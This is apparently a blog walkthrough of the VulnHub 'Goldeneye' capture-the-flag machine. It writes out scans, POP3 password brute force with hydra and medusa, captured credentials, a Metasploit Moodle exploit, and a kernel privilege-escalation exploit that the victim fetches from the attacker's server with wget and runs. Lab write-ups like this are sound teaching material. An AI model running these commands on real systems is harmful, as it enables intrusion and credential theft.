VulnHub Goldeneye Walkthrough

In this walkthrough, we’ll be looking at Goldeneye from VulnHub. This one was a lot of fun simply because of the flavor. It felt a lot like the OSCP labs as well. So let’s get started!

A typical Nmap scan reveals a few ports – 80 and 25.

geye1

nmap -sC -sV -v 192.168.109.133

We’ll check out the webpage but first let’s get another scan going in the background

nmap -sC -sV -v -p- 192.168.109.133

This will search for all ports not just the top 1000 while we do other things.

Navigating to the webpage gives us a fun taste of the box theme.

geye2

It also gives a directory to browse. Let’s see what’s there.

geye3

Well we don’t have any creds to try right now so we’ll come back later. Let’s look at the source of the home page first.

geye4

There’s not much here but let’s see what terminal.js is.

Here we have something interesting. It looks like we have two user names and one encoded password.

geye5

I’m going to use BurpSuite to decode it. Once BurpSuite is open, navigate to the Decoder tab and paste in the encoded string. Then click on the Decode as drop down on the right and select HTML. This reveals the password of InvincibleHack3r.

geye6

Now let’s try that login again.

geye7

It works and we get some more fun stuff and some hints. It’s a good thing we have our scanner going.

Before we leave let’s check the source of this page. Not much is here but at the bottom we do find out that Boris and Natalya are supervisors.

geye8

Now let’s go back to our nmap scan and see if it found the pop3 ports.

geye9

It looks like it did. Unfortunately, the password for Boris doesn’t work.

At this point, we have things we can do and since they might take a little time, let’s get them going at the same time.

First, we’ll get a pop3 brute force going. This is actually where I first ran into trouble. It’s very important to pick a good wordlist here. A lot of times I’ll just use the rockyou wordlist and go do something else while it churns away. In this case, it’s not an option. Hydra will crash after a couple minutes but it will give a suggestion to use a shorter wordlist (this is critical). Medusa won’t crash but it will throw errors and recover so I went with Medusa instead.  The problem is still a short password list. I ended up using a password top 10,000 from SecLists, but even that was too big, and I missed out on getting the password for Boris. His password wasn’t critical though. The password list that ultimately works the best in this case is called fasttrack.txt. It’s native to Kali unlike SecLists which is cloned from GitHub.

Ok so now we have a wordlist, but we need to pick our users. We could do all of them since the list is so short, but the webpage said Boris and Natalya were the administrators to send email to. The nice thing is that we can check their names first. Remember the smtp server on port 25. Let’s see who’s valid.

Using netcat (nc -nv 192.168.109.133 25) we can log into the smtp server. Using vrfy USERNAME we can check the response from the server. Boris and Natalya come back but the others do not. There no sense wasting time brute forcing users that don’t exists so let’s just create a text file with there names only.

geye11

Now we can use hydra or medusa to run through the password list.

hydra -L users -P /usr/share/wordlists/fasttrack.txt pop3://192.168.109.133:55007

or

medusa -U users -P /usr/share/wordlists/fasttrack.txt -h 192.168.109.133 -n 55007 -M pop3 -t 16

With hydra, you’ll want to keep the user names separate because it will crash. At least it did for me, and it won’t recover. Doing one at a time, it won’t run into issues before it finds the passwords.

geye41

Medusa will also have issues, but it will recover and continue, and you can do both names together.

geye13

Either way, after a couple minutes you’ll have passwords for both Boris and Natalya. For all Natalya’s trash talking, her password is actually worse than Boris.

geye12

geye14

Anyway, we’ll just let the brute force run while we do this other stuff.

Next we can start gobuster on the website to see if there are any other hidden directories. gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -u 192.168.109.133 (It won’t find anything)

Finally, we’ll start a nikto scan on the website while we guess passwords. nikto -h 192.168.109.133

This finds a fun page called /splashAdmin.php which gives us some more potential user names and a really good hint we’ll need later.

Users – Xenia and Janus

Hint – GCC is replaced with the FreeBSD alternative (A quick google search shows this as cc.)

geye10

By now our password brute force should be finished and we can put those credentials to good use.

Let’s log into the pop3 server and check out some emails.

nc -nv 192.168.109.133 55007
user boris
pass secret1!
List
Retr 1
Retr 2
Retr 3

geye15

There’s some fun theme stuff here, but nothing important. Let’s do the same with Natalya’s account.

geye16

Now we’re getting somewhere. We have a new page to check and some account creds. You will have to edit the etc/hosts file first as the email suggests. Then navigate to the site.

geye17

At the bottom of the page you can find it’s running moodle. Once logged in it looks like there’s a message from Dr. Doak. Clicking on the contact information shows that his email username is doak.

geye18

Let’s see how secure his password is.

hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.109.133:55007

geye19

These secret agents really need to pick better passwords. Well let’s see what’s in his email.

geye20

Ok now we have some admin creds. Let’s log back into the website with these and see what we can find. Inside a page called My private files is a secret.txt file. Let’s see what’s in it.

geye21

geye22

Let’s view the file

geye23

Hmmm … that doesn’t seem too special. Maybe there’s more to it. Let’s download it and see what else we can find.

We can either run file or exiftool. Either way a base64 encoded string can be found in the image description.

geye24

Decoding this reveals a password for the admin account.

echo eFdpbnRlcjE5OTV4IQ== | base64 -d

geye25

Let’s log in one more time as the admin.

geye26

Now we can easily identify the Moodle version.

geye27

A quick Google search reveals that this version is exploitable and there’s a Metasploit module for it. You could also just search for it in Metasploit.

geye28

There is one important thing to point out with this module. The target id must be set manually. I know it says 0 is automatic, but it doesn’t work right and will fail. So just set the target to 0 before you run the exploit.

geye29

There’s one more thing you’ll have to do to get this to work. The spell check engine must be set to PSpellShell. If you look at the exploit code, it looks like this should be set during exploitation, but it’s not and you have set in manually.

geye31

geye42

Once this is set run the exploit and you should get a shell.

geye32

Now I’ll upgrade my shell using python. It’s not really necessary for this box, but it’s still nicer to work with.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

There are a couple scripts I usually download and run at this point, but it turns out they are not super helpful. The exploits are there but buried. It was much easier to find by enumerating the kernel manually.

uname -a
cat /etc/lsb-release

geye34

The first search that pops up looks like it fits.

It’s C code so let’s use GCC and compile it on our box.

gcc 37292.c

It gives some warnings, but it looks like it compiled. Let’s see if it works.

geye35

I stated a python server and used wget to transfer the file.

Attcker box: python -m SimpleHTTPServer 80
Victim box: wget 192.168.109.128/a.out
Chmod +x a.out
./a.out

geye36

When we run it, it doesn’t work. One of the error messages is gcc: not found.

That’s odd right? Let’s look at the code and search for gcc.

geye37

So the code is compiling something else when it runs. Remember the hint about gcc being removed. The compiler on this box is cc. Let’s change the compiler in the code to cc and see if it works.

Just FYI: the script may freeze the shell. If it does, you’ll have to manually clean up the files and directories left by the exploit before trying the new version.

Once the new version using cc is run, a root shell spawns.

geye38

The root flag is hidden. Use ls -lah to find it.

geye39

The final reward is in a web directory you might have found earlier, but if not, take a look at the ending scene.

geye40

Well that was Goldeneye. The word list thing was a little frustrating, but theme of the box was really fun. Anyway, I hope you enjoyed the walkthrough. If you’d like to see a video walkthrough you can find it here. In the video, I also show how to get a shell without using Metasploit.

Happy Hacking!

-R3a50n

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s